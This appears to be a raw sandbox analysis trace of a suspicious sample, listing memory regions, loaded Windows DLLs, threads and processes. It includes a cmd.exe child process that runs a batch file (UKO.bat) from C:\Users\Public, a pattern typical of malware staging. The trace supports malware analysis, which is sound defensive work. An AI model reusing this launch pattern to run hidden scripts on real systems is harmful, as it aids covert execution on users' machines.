pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 771 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 772 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 773 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 774 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 775 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 776 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 777 start_va = 0x6c160000 end_va = 0x6c1c3fff monitored = 0 entry_point = 0x6c19e270 region_type = mapped_file name = "werui.dll" filename = "\\Windows\\SysWOW64\\werui.dll" (normalized: "c:\\windows\\syswow64\\werui.dll") Region: id = 786 start_va = 0x5d0000 end_va = 0x5d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 789 start_va = 0x6ead0000 end_va = 0x6ecdefff monitored = 0 entry_point = 0x6eb7b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 790 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 810 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 811 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 812 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 813 start_va = 0x743f0000 end_va = 0x74481fff monitored = 0 entry_point = 0x74428cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 814 start_va = 0x6bff0000 end_va = 0x6c156fff monitored = 0 entry_point = 0x6c06b9d0 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\SysWOW64\\dui70.dll" (normalized: "c:\\windows\\syswow64\\dui70.dll") Region: id = 830 start_va = 0x6ffd0000 end_va = 0x6fff7fff monitored = 0 entry_point = 0x6ffd7820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 831 start_va = 0x5e0000 end_va = 0x5e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 832 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 833 start_va = 0x600000 end_va = 0x601fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 840 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 841 start_va = 0x74360000 end_va = 0x743e3fff monitored = 0 entry_point = 0x74386220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 853 start_va = 0x610000 end_va = 0x610fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 854 start_va = 0x6bfb0000 end_va = 0x6bfe3fff monitored = 0 entry_point = 0x6bfc8280 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Thread: id = 15 os_tid = 0x5ec Thread: id = 16 os_tid = 0x808 Thread: id = 18 os_tid = 0x990 Thread: id = 20 os_tid = 0xc48 Process: id = "7" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x25147000" os_pid = "0xf24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x814" cmd_line = "C:\\Windows\\system32\\cmd.exe /K C:\\Users\\Public\\UKO.bat" cur_dir = "C:\\Users\\Public\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 752 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 753 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 754 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 755 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 756 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 757 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 758 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 759 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 760 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 761 start_va = 0x1050000 end_va = 0x10a1fff monitored = 1 entry_point = 0x1064fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 762 start_va = 0x10b0000 end_va = 0x50affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010b0000" filename = "" Region: id = 763 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 764 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 765 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 766 start_va = 0x7fff0000 end_va = 0x7dfc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 767 start_va = 0x7dfc5f810000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc5f810000" filename = "" Region: id = 768 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 769 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 778 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 779 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 780 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 781 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 782 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 783 start_va = 0x400000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 784 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 785 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 787 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 788 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Thread: id = 22 os_tid = 0x1348 Process: id = "8" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x25064000" os_pid = "0x56c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xf24" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 791 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 792 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 793 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 794 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 795 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 796 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 797 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 798 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 799 start_va = 0x7ff747c50000 end_va = 0x7ff747c60fff monitored = 0 entry_point = 0x7ff747c516b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 800 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 801 start_va = 0x7b0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 802 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 803 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 804 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 805 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 806 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 807 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 808 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 809 start_va = 0x190000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 815 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 816 start_va = 0x7ffc451d0000 end_va = 0x7ffc45228fff monitored = 0 entry_point = 0x7ffc451dfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 817 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 818 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 819 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 820 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 821 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 822 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 823 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 824 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 825 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 826 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 827 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 828 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 829 start_va = 0x7ffc5a3a0000 end_va = 0x7ffc5a525fff monitored = 0 entry_point = 0x7ffc5a3ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 834 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 835 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 836 start_va = 0x600000 end_va = 0x787fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 837 start_va = 0x8b0000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 838 start_va = 0xa40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 839 start_va = 0x1e40000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 842 start_va = 0x1e40000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 843 start_va = 0x1fc0000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 844 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 845 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 846 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 847 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 848 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 849 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 850 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 851 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 852 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 855 start_va = 0x7ffc5a7b0000 end_va = 0x7ffc5a845fff monitored = 0 entry_point = 0x7ffc5a7d5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 856 start_va = 0x1fd0000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 857 start_va = 0x2190000 end_va = 0x24c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 858 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 859 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 860 start_va = 0x1e80000 end_va = 0x1ed9fff monitored = 1 entry_point = 0x1e953f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 861 start_va = 0x1ee0000 end_va = 0x1f00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Thread: id = 23 os_tid = 0xc44 Thread: id = 24 os_tid = 0xdd8 Thread: id = 25 os_tid = 0x364